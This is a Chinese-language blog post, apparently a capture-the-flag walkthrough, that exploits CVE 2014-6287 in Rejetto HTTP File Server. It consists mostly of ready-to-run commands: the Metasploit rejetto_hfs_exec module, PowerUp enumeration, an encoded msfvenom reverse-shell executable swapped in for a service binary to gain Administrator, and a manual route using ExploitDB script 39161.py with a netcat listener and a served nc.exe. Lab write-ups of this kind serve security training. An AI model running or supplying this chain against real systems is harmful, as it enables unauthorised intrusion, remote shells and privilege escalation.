windows漏洞CVE 2014-6287实例

CVE 2014-6287
OS:WINDOWS
msfconsole启动控制台
use exploit/windows/http/rejetto_hfs_exec
set rhost目标地址
set rport 目标端口8080
run
拿到meterpreter
dir
cd "c:/Users/bill/Desktop"
cat user.txt 拿到第一个答案
开启第二个kali shell下载提权脚本
下载 提权 脚本
git clone https://github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
cd Privesc
cp PowerUp.ps1 /root/
cd /root
ls
返回第一个msf控制台
cd "c:/Program Files (x86)\IObit"
meterpreter> upload /root/PowerUp.ps1
dir
load powershell
meterpreter>powershell_shell
ps> . .\PowerUp.ps1
ps> Invoke-Allchecks
发现AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
发现 ASCSservice.exe进程有权限

新建msf 会话
use exploit/multi/handler
set payload windows/shell/reverse_tcp (这步很重要经常忘记)
show options
set lhost 10.10.94.115 我的控制端主机地址
set lport 4443
run -j 或exploit -j
启动监听

新建msf
然后生成 后门木马 s
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.94.115 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
ls查看生成否
返回meterpreter命令 ctrl+z 输入 yes确认返回sessions -l
上传木马
meterpreter下转换插入木马的程序目录执行cd "c:/Program Files (x86)\IObit"
meterpreter> upload ASCService.exe
dir
确认ASCService.exe文件上传到c:/Program Files (x86)\IObit下

接下来 输入shell转换meterpreter为shell
sc stop AdvancedSystemCareService9
COPY ASCService.exe "Advanced SystemCare" 输入Yes确认 输入一致
sc start AdvancedSystemCareService9
另个监控的地方sessions -l 查看会话sessions -i 2
whoami
cd C:\Users\Administrator\Desktop
dir
type C:\Users\Administrator\Desktop\root.txt
下一步不使用metasploit进行访问和提权
我们将利用powershell和winpeas进行枚举收集信息
*请注意,您需要同时激活一个Web服务器和一个netcat侦听器,以使其正常工作!*
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe

exit
sessions -K 关闭所有会话
exit
searchsploit rejetto http file server
缺少最新的exploit 所以我们下载
cp /usr/share/exploitdb/exploits/windows/remote/39161.py elliot.py
ls
nano elliot.py
修改我的 ip 和port 9001 保存
下载netcat.exe
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
mv ncat.exe nc.exe
python -m SimpleHTTPServer 80
nc -lvnp 9001
python elliot.py 10.10.226.87 8080 目标ip

通过powershell获得服务命令

powershell -c "Get-Service"

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud

您是第8231079 位访客, 您的IP是:[34.232.51.240]